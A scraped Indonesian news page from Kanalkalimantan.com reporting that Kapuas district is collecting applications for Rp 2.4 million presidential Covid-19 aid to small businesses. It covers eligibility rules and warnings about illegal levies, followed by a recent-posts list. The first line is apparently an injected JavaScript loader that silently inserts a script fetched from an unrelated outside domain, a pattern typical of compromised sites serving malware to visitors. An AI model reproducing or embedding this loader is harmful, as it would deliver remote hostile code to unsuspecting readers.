(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Kabupaten Kapuas

Pelaku UMKM di Kapuas Akan Terima Banpres Sebesar Rp 2,4 Juta


KANALKALIMANTAN. COM, KUALA KAPUAS – Dinas Perindustrian dan Perdagangan, dan Koperasi Usaha Kecil Menengah (Disperindagkop dan UKM) Kabupaten Kapuas, memprediksi seribu warga yang tersebar seluruh kecamatan menyerahkan berkas untuk menerima bantuan modal kerja sebesar Rp 2,4 juta bagi pelaku Usaha Mikro Kecil dan Menengah (UMKM).

Hal itu disampaikan Plt. Kepala Disperindagkop dan UKM Kabupaten Kapuas, Batu Panahan, di ruang kerjanya, Selasa (20/10/2020). Bantuan Presiden (BanPres) ini disalurkan untuk membantu pelaku usaha kecil yang terdampak Covid-19.

Batu Panahan menjelaskan, berkas yang telah diserahkan tersebut akan diinput dan dikirim ke Kementerian Koperasi dan UKM bersama Kementerian Keuangan, dan Otoritas Jasa Keuangan (OJK).

“Kami hanya menerima berkas dan menginput data masyarakat, selebihnya yang menentukan bukan kami. Makanya kami terima berapapun berkas yang masuk, karena kuota tidak terbatas untuk setiap kabupaten/kota,” terang Batu.

Untuk Kabupaten Kapuas, telah dilakukan pencairan tahap pertama terhadap pelaku usaha masyarakat melalui pihak penyalur Bank BRI dan Bank BNI

Batu Panahan menyebutkan tidak semua pelaku usaha mendapat bantuan itu, meski berkasnya telah dilayangkan ke dinas. Bantuan tersebut hanya diberikan kepada pengusaha kecil yang baru memulai usahanya atau sudah menekuni sejak lama.

“Pelaku usaha kecil yang sedang menerima Kredit Modal Usaha Rakyat (KUR) atau kredit lain dari perbankan dan Aparatur Sipil Negara (ASN), anggota TNI/Polri atau pegawai BUMN/BUMD tidak berhak menerima,” terang Batu Panahan.

Jika masyarakat yang telah mengajukan berkas dan tercatat sebagai penerima bantuan lain dari pemerintah selama pandemi Covid, maka secara otomatis berkasnya itu gagal dilanjutkan ke tahap berikutnya. “Nanti sudah ada informasi melalui Nomor Induk Kependudukan (NIK) apakah seseorang itu telah menerima bantuan selama Covid,” paparnya.

Batu Panahan juga menegaskan kepada masyarakat kapuas, apabila ingin menyerahkan berkas Bantuan Produktif Usaha Mikro, agar kiranya menyerahkan langsung kepada petugas di kantor disperindagkop.

“Kepada masyarakat waspada terhadap kemunculan pungutan liar (pungli) dari pihak tak bertanggung jawab dalam proses penyerahan berkas sampai proses pencairan program bantuan tersebut dan apabila ada terindikasi pungli, segera laporkan”tegas Plt Kepala Disperindagkop Kapuas. (Kanalkalimantan.com/ags)

Reporter : Ags
Editor : Cell

Al Ghifari

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

8 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

10 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

10 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

11 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

15 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

18 jam ago

This website uses cookies.